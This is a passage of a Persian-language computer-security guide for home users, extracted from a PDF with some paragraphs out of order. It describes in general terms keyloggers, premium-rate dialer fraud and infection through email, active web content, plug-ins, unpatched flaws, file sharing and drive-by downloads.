ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺑـﺎ ﻛـﺎﺭﺑﺮﺩ ﻣـﺸﺎﺑﻪ ﺗﺤـﺖ ﻋﻨــﺎﻭﻳﻨﻲ ﭼــﻮﻥ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺭﺍﻩ ﺩﻭﺭ ٥٣ﻳــﺎ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺭﺍﻫﺒﺮﻱ ﺭﺍﻩ ﺩﻭﺭ ٥٤ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﺮﻭﻉ ﻭ ﺑـﺴﻴﺎﺭ ﻭ ﭘﺮﺍﺳـﺘﻔﺎﺩﻩﺍﻱ ﻫﺴﺘﻨﺪ .ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﻛـﺎﺭﻱ ﺧـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﻣﺎﻧﻨﺪ ﻧـﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ. ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ ٥٥ ﻣﻔﻬﻮﻡ "ﺛﺒﺖﻛﻨﻨﺪﻩ ﻛﻠﻴﺪ" ﺍﺯ ﻧﺎﻡ ﺁﻥ ﻣﺸﺨﺺ ﺍﺳﺖ .ﺁﻧﻬﺎ ﺗﻤـﺎﻣﻲ ﻛﻠﻴﺪﻫﺎﻱ ﻓﺸﺮﺩﻩ ﺷﺪﺓ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﺭﺍ ﺛﺒـﺖ ﻭ ﺩﺭ ﻳـﻚ ﻓﺎﻳـﻞ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻓﺎﻳﻞ ﻣﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺁﻳﻨـﺪﻩ ﺑـﺎ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﻃﺮﻳﻖ ﺩﺭﺏ ﻣﺨﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺑﮕﻴـﺮﺩ ﻭ ﻳـﺎ ﺍﺯ ﻃﺮﻳـﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﻭﺏ ﺑﺮﺍﻱ ﻧﻮﻳﺴﻨﺪﺓ ﺑﺮﻧﺎﻣﻪ ﺍﺭﺳﺎﻝ ﮔﺮﺩﺩ. ﺷﺎﻳﺎﻥ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺛﺒﺖﻛﻨﻨﺪﻩ ﻛﻠﻴﺪ ﺗﻤـﺎﻣﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﻭﺍﻗﻌـﹰﺎ ﺗﺎﻳﭗ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﺪ ﻭ ﻧﻪ ﺁﻧﭽﻪ ﻛﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺣﺘﻲ ﺍﮔـﺮ ﺷـﻤﺎﺭﺓ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺭﺍ Denial of Service Attack Remote Access Tools Remote Administration Tools Keyloggers 52 53 54 55 ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺍﻳﻤﻦ ﻭﺍﺭﺩ ﻛﻨﻴﺪ )ﻳﻌﻨﻲ ﺍﮔﺮ ﻫﻨﮕﺎﻡ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺷـﻮﺩ( ،ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ ﺩﻗﻴﻘـﹰﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺗﺎﻳـﭗ ﻣﻲﻛﻨﻴﺪ ﺭﺍ -ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﺸﺪﻩ -ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﺪ. ﺳﺮﻗﺖ ﻣﺎﻟﻲ ﺩﺭ ﺍﻛﺜﺮ ﺳﺮﻗﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭﻧﺘﻴﺠﺔ ﺣﻤﻼﺕ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩﺍﻧﺪ ،ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻗﺮﺑﺎﻧﻲ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﻮﺍﺭﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﺑﺎﺭ ،ﭘﻮﻝ ﻣﺴﺮﻭﻗﻪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺑـﻪ ﻣـﺼﺮﻑ ﺭﺳﻴﺪﻩ ﺍﺳﺖ .ﺳﺎﺩﻩﺗﺮﻳﻦ ﻣﺜﺎﻝ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ،ﻳـﻚ ﻣـﻮﺩﻡ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ﻣﻘﺎﺻﺪ ﺩﻭﺭﺩﺳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲﺗﻮﺍﻧـﺪ ﺻﺤﺒﺖ ﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﻫﻴﭻ ﻣﺰﻳﺘﻲ ﻧﺪﺍﺭﺩ ،ﺑﺠـﺰ ﻧﻮﻋﻲ ﺍﺣﺴﺎﺱ ﺭﺿﺎﻳﺖ ﺷﻴﻄﺎﻧﻲ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﺷـﻤﺎ ﺩﺭ ﭘﺎﻳـﺎﻥ ﻣﺎﻩ ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺳـﻨﮕﻴﻦ ﺍﺯ ﺷـﺮﻛﺖ ﻣﺨـﺎﺑﺮﺍﺕ ﺩﺭﻳﺎﻓـﺖ ﻣﻲﻛﻨﻴﺪ. 
ﺩﺭ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﻬـﺮﺓ ﺷﺨـﺼﻲ ﺑﺒﺮﺩ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎﺭﻩ ﺗﻠﻔـﻦ ﺧﺎﺻـﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻭﻗﺘﻲ ﺑﺎ ﺁﻥ ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ ﺷﺮﻛﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺩﺭ ﻫﺮ ﺩﻗﻴﻘﻪ ﻫﺰﻳﻨﺔ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺗﻤﺎﺱ ﮔﻴﺮﻧﺪﻩ ﺛﺒﺖ ﻛﻨﺪ ﻭ ﺩﺭ ﻋﻮﺽ ﻣﻘﺪﺍﺭﻱ ﺍﺯ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺑﻪ ﺣﺴﺎﺏ ﻛـﺴﻲ ﺑـﺮﻭﺩ ﻛﻪ ﺑﺎ ﺍﻭ ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﺍﻣـﺮ ﺩﺭ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠـﻒ ﻣﻌﺎﻣﻼﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ،ﺍﻣﺎ ﺑﻴﺸﺘﺮ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺷﺮﻛﺘﻬﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺧﻮﺍﻫﺎﻥ ﺭﺍﻩ ﺳﺎﺩﻩﺍﻱ ﻫﺴﺘﻨﺪ ﺗـﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺪﻭﻥ ﺿﻤﺎﻧﺖ ﻫﺰﻳﻨﻪﺍﻱ ﺭﺍ ﺍﺯ ﺣﺴﺎﺏ ﺷﻤﺎ ﻛـﺴﺮ ﻧﻤﺎﻳﻨــﺪ .ﺩﺭ ﭼﻨــﻴﻦ ﻭﺿــﻌﻴﺘﻲ ﺷــﺮﻛﺖ ﻣﺨــﺎﺑﺮﺍﺕ ﻫﺰﻳﻨــﻪﻫــﺎﻱ ﺗﻤﺎﺱ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ ﻫﺰﻳﻨﺔ ﺗﻤﺎﺳﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﻪ ﺷﺮﻛﺘﻲ ﻛـﻪ ﺑـﺎ ﺁﻥ ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﺷـﺪﻩ ﺍﺳـﺖ ﺍﺭﺳـﺎﻝ ﻛﻨـﺪ .ﺍﮔـﺮ ﻧﻔـﻮﺫﮔﺮ ﭼﻨـﻴﻦ ﺷﻤﺎﺭﻩﺍﻱ ﺩﺍﺷﺘﻪﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻃﻮﺭﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﻨﺪ ﻛﻪ ﺑﺎ ﺍﻳﻦ ﺷﻤﺎﺭﻩ ﺗﻤﺎﺱ ﺑﮕﻴـﺮﺩ ﻭ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ ﺗﻤـﺎﺱ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻧﮕﻬﺪﺍﺭﺩ .ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺩﺭ ﺻﻮﺭﺗﺤﺴﺎﺏ ﭘﺎﻳـﺎﻥ ﻣﺎﻩ ﺗﻠﻔﻦ ﺷﻤﺎ ﺩﺭﺝ ﺧﻮﺍﻫﺪ ﺷﺪ. ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﭼﮕﻮﻧﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ؟ ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺗﻨﻬﺎ ﺭﺍﻩ ﺁﻟﻮﺩﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻮﺳـﻴﻠﺔ ﻭﻳﺮﻭﺱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ،ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳـﺴﻜﻬﺎﻱ ﺁﻟـﻮﺩﻩ ٧٥ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻨﺪ ﺳﺎﻝ ﻗﺒـﻞ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﺎﻳﻌﺎﺗﻲ ﮔﺴﺘﺮﺵ ﻳﺎﻓﺖ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜـﻪ ﺑـﺎ ﺩﺭﻳﺎﻓـﺖ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺁﻟـﻮﺩﻩ ﺷـﻮﻳﺪ .ﻣـﺪﻳﺮﺍﻥ ﻭ ﻣـﺴﺌﻮﻻﻥ ﺳﻴﺴﺘﻢ ﻣﺠﺒﻮﺭ ﺑﻮﺩﻧﺪ ﻣﺪﺍﻭﻣﹰﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻨﺪ ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ "ﻏﻴﺮ ﻣﻤﻜﻦ" ﺍﺳﺖ ،ﻭ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ ﻧﻴﺎﻳﺪ ،ﻣﺎﺷﻴﻦ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻥ ﺩﺭ ﺍﻣﻨﻴﺖ ﻛﺎﻣﻞ ﻫﺴﺘﻨﺪ. ﺁﻟﻮﺩﻩ ﺷﺪﻥ ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﺮﻭﺯ ﺩﻳﮕﺮ ﺍﻣـﺮ ﻣﺤـﺎﻟﻲ ﻧﻴﺴﺖ ﻭ ﺩﺭﻭﺍﻗﻊ ﺑﺴﻴﺎﺭ ﻫﻢ ﻣﺤﺘﻤﻞ ﺍﺳﺖ .ﺩﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺿﺎﻓﻪﺷﺪﻩ ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻋﺚ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺷﺪﻩﺍﻧﺪ. ﺍﻭﻟﻴﻦ ﺗﻐﻴﻴﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ ﺍﻣـﺮﻭﺯﻩ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺿـﻤﺎﻳﻢ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ .ﺩﺭ ﮔﺬﺷﺘﻪ ﻛﺎﺭﺑﺮ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺭﺍ ﺫﺧﻴـﺮﻩ ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﺍﺟﺮﺍ ﻣﻲﻛـﺮﺩ ،ﺍﻣـﺎ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺍﺟـﺮﺍﻱ ﺧﻮﺩﻛـﺎﺭ ﺿــﻤﺎﺋﻢ ﻛﺎﺭﻫــﺎ ﺭﺍ -ﻣﺨــﺼﻮﺻﹰﺎ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﻣﺒﺘــﺪﻱ ﻛــﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺍﺿﺎﻓﻪ ﺁﻧﭽﻪ ﻛﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻩ ﺍﺳﺖ ﺭﺍ ﺑﺒﻴﻨﻨﺪ -ﺳﺎﺩﻩﺗﺮ ﻛﺮﺩﻩ ﺍﺳﺖ. 
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﻨﭽﻨﻴﻨـﻲ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﺧـﻼﻕ ﺑﺎﺷـﻨﺪ .ﺍﺧﻴـﺮﹰﺍ ﺗﻌـﺪﺍﺩﻱ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺁﻟﻮﺩﻩ ﺑﻪ ﻭﻳﺮﻭﺱ ﻣﻨﺘﺸﺮ ﺷﺪ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛـﺮﺩ ﺍﺯ ﻃﺮﻑ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ ﻭ ﺣﺎﻭﻱ ﺁﺧﺮﻳﻦ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺑﺎﺷﺪ ﻛـﻪ ﺩﺭ ﺑﺮﺍﺑـﺮ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﻛﺮﻣﻬـﺎ ﺍﺯ ﺷـﻤﺎ ﻣﺤﺎﻓﻈـﺖ ﻣﻲﻧﻤﺎﻳﺪ .ﺍﻳﻦ ﻧﺎﻣﻪﻫﺎ ﺷﺎﻣﻞ ﺗـﺼﺎﻭﻳﺮ ﻭ ﻧﻤﺎﺩﻫـﺎﻳﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﻣﻌﺘﺒﺮ ﺑﻨﻈﺮ ﻣﻲﺭﺳـﻨﺪ ﻭ ﻟـﺬﺍ ﻛـﺎﺭﺑﺮ ﺭﺍ ﻣﺘﻘﺎﻋـﺪ ﻣﻲﺳﺎﺯﻧﺪ ﻛﻪ ﺿﻤﺎﻳﻢ ﺑﺎﻳﺪ ﺑﻪ ﺳﺮﻋﺖ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺑﻴﺎﻳﻨـﺪ .ﻭﺍﺿـﺢ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﺿﻤﻴﻤﻪﻫﺎ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨـﺪ ﺩﭼـﺎﺭ ﺩﺭﺩﺳـﺮﻫﺎﻱ ﺍﺳﺎﺳﻲ ﺧﻮﺍﻫﺪ ﺷﺪ. ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺷﺒﻜﺔ ﮔﺴﺘﺮﺩﺓ ﺟﻬـﺎﻧﻲ ٥٦ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﺪ ﺻـﻔﺤﺎﺕ ﻭﺑﻲ ﺍﻳﺠﺎﺩ ﺷﺪﻧﺪ ﻛﻪ ﺷﺎﻣﻞ ﻣﺘﻨﻬﺎ ﻭ ﺗﺼﺎﻭﻳﺮ ﺑﻮﺩﻧﺪ .ﺍﻛﻨـﻮﻥ ﺍﻳـﻦ ﺻﻔﺤﺎﺕ ﺷﺎﻣﻞ ﻣﺤﺘﻮﻳﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻫﺴﺘﻨﺪ ،ﻣﺜـﻞ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﭘﻮﻳــﺎﻳﻲ ﻛــﻪ ﺭﻭﻱ ﻣﺎﺷــﻴﻦ ﺷــﻤﺎ downloadﺷــﺪﻩ ﻭ ﺍﺟــﺮﺍ ﻣﻲ ﮔﺮﺩﻧﺪ ) ،Java ،Javascriptﻭ .(ActiveXﺍﮔﺮ ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﺧﻮﺩ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﺭﺍ ﺑـﺪﻭﻥ ﺑﺮﺭﺳـﻲ ﻗﺎﺑﻠﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺟﺮﺍ ﻛﻨﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺭﺍ ﺑﺮﺧﻼﻑ ﺁﻧﭽﻪ ﻛﻪ ﺑﺎﻳﺪ ،ﺍﺟﺮﺍ ﻧﻤﺎﻳﺪ .ﺑﺮﻧﺎﻣﺔ Javascriptﺑﻄـﻮﺭ ﻛﻠﻲ ﺍﻳﻤﻦ ﺍﺳـﺖ ،ﺍﻣـﺎ Javaﻭ ActiveXﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺴﻴﺎﺭ ﻻ ﻣﻲﺗﻮﺍﻥ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺭﺍ ﻃـﻮﺭﻱ ﺗﻨﻈـﻴﻢ ﺧﻄﺮﻧﺎﻙ ﺑﺎﺷﻨﺪ .ﻣﻌﻤﻮ ﹰ ﻛﺮﺩ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺟﺎﺯﻩ ﺍﺟﺮﺍ ﻧﺪﻫﻨﺪ ﻭ ﻳﺎ ﻗﺒـﻞ ﺍﺯ ﺍﺟـﺮﺍﻱ ﺁﻧﻬﺎ ﺍﺯ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﻩ ﺑﮕﻴﺮﻧﺪ. Plug-inﻫﺎ ﻭ Add-onﻫﺎ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻭ ﺑﺴﻴﺎﺭﻱ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺩﻳﮕﺮ )ﻣﺜﻞ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﻛﻠﻤﻪ ٥٧ﻭ ﺻﻔﺤﺎﺕ ﮔﺴﺘﺮﺩﻩ (٥٨ﺑﻪ ﺑﺮﺧﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍ ﺷﺪﻥ World-Wide Web Word Processors Spreadsheets 56 57 58 ﺑﺨﺶ ﺩﻭﻡ ﺑﻮﺩ ﻭ ﺍﮔﺮ ﺑﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺁﻟﻮﺩﻩ ﺷﺪﻩ ﺑﻮﺩﻧـﺪ ﺗﺒـﺎﺩﻝ ﻓﺎﻳـﻞ ﺍﻧﺠـﺎﻡ ﻧﻤﻲﺩﺍﺩﻳﺪ ﺩﺭ ﺍﻣﻨﻴﺖ ﺑـﻪ ﺳـﺮ ﻣـﻲﺑﺮﺩﻳـﺪ .ﺳﻴـﺴﺘﻤﻬﺎﻱ UNIX ﭼﻨﺪﺍﻥ ﻣﺴﺘﻌﺪ ﺩﺭﻳﺎﻓﺖ ﻭﻳﺮﻭﺱ ﻧﺒﻮﺩﻧﺪ ﺍﻣﺎ ﺑﻪ ﺩﻟﻴـﻞ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺷـﻜﺎﻻﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍﻳﺞ ،ﺣﺘﻲ ﺩﺭ ﺁﻥ ﺭﻭﺯﻫﺎ ﻫﻢ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺳﺘﻴﺎﺑﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ ﻭ ﺭﻭﻱ ﺁﻧﻬﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﺭﺏ ﻣﺨﻔﻲ ﻧﺼﺐ ﻧﻤﺎﻳﻨﺪ .ﺍﻭﻟﻴﻦ ﺣﺎﺩﺛﺔ ﺟﺪﻱ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺮﻣـﻲ ﺑـﻮﺩ ﻛـﻪ ﺩﺭ ﺳﺎﻝ ۱۹۸۸ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ UNIXﺣﻤﻠﻪ ﻛﺮﺩ .ﺍﻣـﺮﻭﺯ ﻣﻤﻜـﻦ ﺍﺳﺖ ﺷﻤﺎ ﺑﻪ ﺭﻭﺷـﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﻣـﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﺑﮕﻴﺮﻳـﺪ. 
The methods described below apply to Windows-based systems. Macintosh and Unix systems are somewhat less prone to these attacks, not necessarily because they are more secure but because Windows systems are usually more attractive targets for attackers. Unix systems come next, and Macintosh systems have so far suffered the least from their vulnerabilities.

The second change is that, in the effort to make e-mail software simpler and more powerful, HTML can now be used in the body of an e-mail message, even though HTML can contain problematic instructions. For example, HTML can automatically direct the web browser to a predetermined web site that may not be suitable for you or your children.

from inside the main program. A common example is Adobe Acrobat Reader, which lets you view PDF files while browsing the web. Once installed, plug-ins and add-ons can do anything the main program can do, such as reading from and writing to the disk or using the network connection, so they should be installed and used only when their source is fully trusted.

Security holes

Security holes are flaws in parts of the operating system or in other system components that allow an attacker to access information on the system or to take control of it. In recent years most software vendors have responded reasonably quickly to security problems discovered in their systems. So if you apply security patches to your system regularly, you can close the routes of intrusion to attackers before the flaws become widely known.
File sharing

File sharing exists in various forms in all operating systems. Sharing files among the employees of a company is very useful, and if you have several machines, sharing files among them is a much-needed capability. However, if you share files over the Internet without an appropriate security policy for it (such as proper user names and passwords and restricted write and update privileges), then any attacker in the world will also be able to share your files. Moreover, if you allow others to write to your disks, an attacker will be able to configure your computer however he likes.

Drive-by downloads

A drive-by download occurs when you visit a web site and the HTML on the page automatically requests a Java or ActiveX program, and that program in turn downloads another program, runs it, or arranges for it to be run later. The HTML code can also arrive in an e-mail message. If you have allowed Java or ActiveX programs to install software without asking you or even notifying you, they will be able to download and install 